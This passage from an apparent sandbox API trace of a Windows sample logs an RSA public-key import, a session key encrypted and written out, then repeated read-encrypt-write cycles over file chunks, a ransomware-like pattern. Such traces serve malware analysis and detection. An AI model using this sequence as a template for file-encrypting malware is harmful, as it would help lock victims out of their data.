pcbStructInfo=0x2b9ce48) returned 1 [0275.373] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f29d28) returned 1 [0275.373] CryptImportPublicKeyInfo (in: hCryptProv=0x2f29d28, dwCertEncodingType=0x1, pInfo=0x2f340a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f340d0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f340d8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fb788) returned 1 [0275.373] CryptEncrypt (in: hKey=0x2fb788, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0275.373] CryptEncrypt (in: hKey=0x2fb788, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2a9e8*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2a9e8*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0275.373] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f2a9e8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2a9e8*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0275.374] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.392] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.392] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.395] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.395] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.395] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.395] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.395] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.395] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.395] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.395] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.395] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.395] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.417] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.417] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.417] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.418] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.418] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.420] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.420] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.420] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.420] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.420] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.420] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.421] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.421] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.421] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.421] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.421] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.421] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.421] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.421] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.421] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.421] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.421] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.421] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.422] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.422] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.422] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.422] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.422] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.422] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.422] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.422] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.422] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.422] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.422] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.422] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.422] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.423] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.423] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.423] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.423] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.423] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.423] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.423] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.423] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.423] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.423] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.423] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.423] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.424] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.424] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.424] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.424] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.424] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.424] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.424] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.424] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.425] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.425] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.425] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.425] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.425] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.425] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.425] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.425] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.425] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.425] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.425] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.425] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.425] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.425] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.425] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.426] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.426] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.426] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.426] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.426] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.426] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.426] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.426] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.426] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.426] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.426] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.426] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.427] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.427] 